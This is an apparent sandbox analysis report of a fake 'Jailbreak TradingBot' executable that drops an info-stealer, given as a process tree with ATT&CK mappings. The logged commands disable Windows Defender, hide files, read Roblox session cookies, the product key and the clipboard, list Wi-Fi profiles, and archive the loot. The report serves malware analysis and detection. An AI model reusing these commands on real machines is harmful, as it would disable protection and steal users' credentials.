C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1812

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2288

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5996

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv uoA8EPR7jEGXyNrqurEFYw.0.2
1⤵
PID:6024

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
PID:5156

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3532

C:\Users\Admin\Downloads\Jailbreak TradingBot.exe
"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5700
- C:\Users\Admin\AppData\Roaming\Opperhoofd.exe
  "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
  2⤵
  - Executes dropped EXE
  PID:5704
- C:\Users\Admin\AppData\Roaming\Built.exe
  "C:\Users\Admin\AppData\Roaming\Built.exe"
  2⤵
  - Executes dropped EXE
  PID:5680
- - C:\Users\Admin\AppData\Roaming\Built.exe
    "C:\Users\Admin\AppData\Roaming\Built.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
      4⤵
      PID:6052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5648
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1036
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:4976
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:5232
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:2436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5056
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:3752
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:3664
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2080
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2712
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5140
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:3968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2976
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5788
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3312
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:4652
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5812
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:5500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5404
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5864
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2220
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5296
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3492
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5664
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5160
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:416
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:3244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:4536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:3372
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:3808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *"
      4⤵
      PID:5744
    - - C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2660
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:5168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6028
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:1868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1408
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5940
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5288
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:1224

C:\Users\Admin\Downloads\Jailbreak TradingBot.exe
"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:372
- C:\Users\Admin\AppData\Roaming\Opperhoofd.exe
  "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
  2⤵
  - Executes dropped EXE
  PID:5652
- C:\Users\Admin\AppData\Roaming\Built.exe
  "C:\Users\Admin\AppData\Roaming\Built.exe"
  2⤵
  - Executes dropped EXE
  PID:5512
- - C:\Users\Admin\AppData\Roaming\Built.exe
    "C:\Users\Admin\AppData\Roaming\Built.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
      4⤵
      PID:4692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:408
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:4140
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:5228
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:5104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5560
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4392
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:3632
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"
        5⤵
        Views/modifies file attributes
        
        PID:768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5224
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4592
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5844
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:3164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:5284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3680
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3488
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1288
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1252
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:2720
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:2128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:4468
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5600
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5780
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6096
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6028
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1964
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5904
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:656
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5616
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:2792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *"
      4⤵
      PID:1460
    - - C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *
        5⤵
        Executes dropped EXE
        
        PID:5156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3488
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:5380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:4084
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5788
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1076
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6068
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:3960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5264
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:4988

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

